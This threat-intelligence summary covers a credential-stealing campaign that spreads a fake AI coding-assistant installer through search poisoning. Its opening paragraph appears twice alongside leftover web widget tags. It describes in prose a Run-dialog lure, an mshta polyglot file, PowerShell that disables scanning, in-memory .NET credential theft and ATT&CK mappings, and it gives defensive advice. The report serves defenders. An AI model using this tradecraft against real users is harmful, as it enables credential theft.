EXECUTIVE SUMMARY
The campaign is attributed to a financially motivated cybercrime group that has adopted a fake installer for a popular AI coding assistant. It employs a search‑engine poisoning technique to present a spoofed download page to users searching for installation guides. The operation primarily targets small‑business owners, educators, and hobbyist developers in North America and Europe, sectors that lack dedicated security teams. The attackers’ objective is credential theft, using the counterfeit installer to harvest login data and gain access to personal and corporate accounts.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY
The campaign is attributed to a financially motivated cybercrime group that has adopted a fake installer for a popular AI coding assistant. It employs a search‑engine poisoning technique to present a spoofed download page to users searching for installation guides. The operation primarily targets small‑business owners, educators, and hobbyist developers in North America and Europe, sectors that lack dedicated security teams. The attackers’ objective is credential theft, using the counterfeit installer to harvest login data and gain access to personal and corporate accounts.[emaillocker id="1283"]
Victims are directed from the poisoned search result to a counterfeit installation page that instructs them to open the Windows Run dialog and paste a command invoking the system’s HTML application host. The command retrieves a polyglot file that appears as an audio track but also contains an HTA script, allowing it to bypass file‑type filters. Once executed, the script launches a hidden PowerShell process that disables script scanning, decodes additional payloads in memory, and loads a reflective .NET module. The module operates entirely in memory, harvesting stored credentials and transmitting them to a remote command‑and‑control server.
The threat is significant because it targets users who are unlikely to have endpoint protection or network filtering, and it leaves no file artifacts, making traditional antivirus and forensic methods ineffective. The per‑victim subdomain design further hinders shared indicator use, while the in‑memory execution evades process‑based monitoring. Organisations should enforce strict web filtering, block the HTML application host from initiating outbound connections, and monitor for unusual PowerShell activity and DNS queries to unknown domains. Regular user education, timely patching of browsers, and robust credential hygiene are essential to reduce exposure.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Persistence | T1053.005 | Scheduled Task/Job | Scheduled Task |
| Defense Evasion | T1218.005 | System Binary Proxy Execution | Mshta |
| Defense Evasion | T1562.001 | Impair Defenses | Disable or Modify Tools |
| Defense Evasion | T1027 | Obfuscated Files or Information | — |
| Defense Evasion | T1620 | Reflective Code Loading | — |
| Credential Access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| Command and Control | T1568.002 | Dynamic Resolution | Domain Generation Algorithms |
| Command and Control | T1105 | Ingress Tool Transfer | — |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | — |
REFERENCES:
The following reports contain further technical details:
https://cybersecuritynews.com/hackers-use-fake-claude-code-install-page/
https://www.cyderes.com/howler-cell/fake-claude-code-installer-infostealer